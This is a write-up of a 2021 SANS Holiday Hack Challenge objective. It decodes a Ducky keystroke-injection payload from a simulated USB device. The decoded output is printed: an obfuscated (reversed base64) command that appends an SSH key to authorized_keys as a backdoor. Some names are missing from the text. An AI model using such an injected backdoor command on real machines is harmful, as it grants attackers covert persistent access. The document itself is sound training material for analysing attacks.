This is challenge number 5 in the 2021 SANS Holiday Hack Challenge ( Objective:

Assist the elves in reverse engineering the strange USB device. Visit Santa’s Talks Floor and hit up Jewel Loggins for advice.

We start by logging onto the terminal on the Talks floor. We see that we need to find the username of the troll involved with this attack, and it tells us that the strange USB device has been mounted at /mnt/USBDEVICE

Objective5 terminal

If we take a peek of the inject.bin, we find a bunch of unreadable binary characters

Objective5 injectbin

We also find a reference to a file called If we do a google search for this script we learn that this is a Ducky script decoder ( So what is Ducky? Further research leads us to determine that (

Ducky is a keystroke injection tool disguised as a generic flash drive. Computers recognize it as a regular keyboard and automatically accept its pre-programmed keystroke payloads at over 1000 words per minute.

So putting 2 and 2 together, the inject.bin must be a ducky script, and they want us to decode that script using Let’s do that!

python3 -f /mnt/USBDEVICE/inject.bin

Objective5 mallardoutput

We find this produces a readable set of instructions that have been encoded on the USB. None of the lines point to anything that tell us what the username of the troll may be, but we can observe a base64 encoded string that gets echo’d in the script. If we decode that:

88665a561824:Downloads bryan$ echo ==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SChVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVdGNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhkU14UbVBSYzJXLoN3cnAyboNWZ | rev | base64 -d

echo 'ssh-rsa UmN5RHJZWHdrSHRodmVtaVp0d1l3U2JqZ2doRFRHTGRtT0ZzSUZNdyBUaGlzIGlzIG5vdCByZWFsbHkgYW4gU1NIIGtleSwgd2UncmUgbm90IHRoYXQgbWVhbi4gdEFKc0tSUFRQVWpHZGlMRnJhdWdST2FSaWZSaXBKcUZmUHAK' >> ~/.ssh/authorized_keys

Ah-hah! Here we find that the USB device was adding a backdoor SSH account for user We now have our answer!

Objective5 answer

Objective5 complete